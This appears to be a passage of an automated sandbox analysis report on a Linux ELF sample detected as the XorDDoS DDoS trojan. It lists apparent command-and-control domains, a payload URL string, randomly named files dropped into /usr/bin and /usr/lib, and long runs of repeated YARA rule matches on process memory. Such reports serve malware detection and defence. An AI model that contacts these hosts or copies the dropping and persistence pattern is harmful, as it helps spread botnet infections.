Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: ee.nnmm234.com

Source: eTASxT3bjO.elf, exnwncfijy.13.dr, libudev.so.13.dr, ygqhgbaeei.13.dr, svkksitypo.13.dr, zqylkjndwx.13.dr, uruvhkrplh.13.dr, xaxopmwzau.13.dr, ghgagimgub.13.dr, eoogzzilvp.13.dr, evbjclrakz.13.dr, yfaogzsdtv.13.dr, kffnhivjdw.13.dr, xjdcsmwtwe.13.dr, mqnpjwpasf.13.dr, vijnytmbcx.13.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: eTASxT3bjO.elf, 5433.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5435.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5436.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5437.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5450.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5453.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5455.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5458.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5461.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5470.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5473.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5475.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5478.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5481.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5493.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5496.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5498.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5501.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5504.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5530.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5533.1.00000000ff8e3000.00000000ff904000.rw-.sdmp	String found in binary or memory: https://ww.aass654.com/config.rar
Source: eTASxT3bjO.elf, 5433.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5435.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5436.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5437.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5450.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5453.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5455.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5458.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5461.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5470.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5473.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5475.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5478.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5481.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5493.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5496.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5498.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5501.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5504.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5530.1.00000000ff8e3000.00000000ff904000.rw-.sdmp, eTASxT3bjO.elf, 5533.1.00000000ff8e3000.00000000ff904000.rw-.sdmp	String found in binary or memory: https://ww.aass654.com/config.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: eTASxT3bjO.elf, type: SAMPLE
Source: Yara match	File source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5433, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5437, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5458, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5461, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5473, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5475, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5478, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5481, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5498, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5501, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5530, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5533, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5535, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5538, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5541, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5551, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5553, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5558, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5565, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5570, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5573, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5582, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5585, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5589, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5594, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5601, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5606, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5609, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5623, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5625, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5631, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5638, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5641, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5643, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5646, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5655, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5657, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5663, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5666, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5672, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5675, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5677, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5683, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5691, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5694, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5699, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eTASxT3bjO.elf PID: 5702, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ygqhgbaeei, type: DROPPED
Source: Yara match	File source: /usr/bin/kffnhivjdw, type: DROPPED
Source: Yara match	File source: /usr/bin/svkksitypo, type: DROPPED
Source: Yara match	File source: /usr/bin/eoogzzilvp, type: DROPPED
Source: Yara match	File source: /usr/bin/xjdcsmwtwe, type: DROPPED
Source: Yara match	File source: /usr/bin/evbjclrakz, type: DROPPED
Source: Yara match	File source: /usr/bin/wvicexcnqi, type: DROPPED
Source: Yara match	File source: /usr/bin/zqylkjndwx, type: DROPPED
Source: Yara match	File source: /usr/bin/mqnpjwpasf, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/yfaogzsdtv, type: DROPPED
Source: Yara match	File source: /usr/bin/xaxopmwzau, type: DROPPED
Source: Yara match	File source: /usr/bin/vijnytmbcx, type: DROPPED
Source: Yara match	File source: /usr/bin/uruvhkrplh, type: DROPPED
Source: Yara match	File source: /usr/bin/ghgagimgub, type: DROPPED
Source: Yara match	File source: /usr/bin/exnwncfijy, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: eTASxT3bjO.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5680.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5713.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5450.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5628.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5601.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5437.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5702.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5743.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5604.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5638.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5535.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5760.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5655.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5558.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5683.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
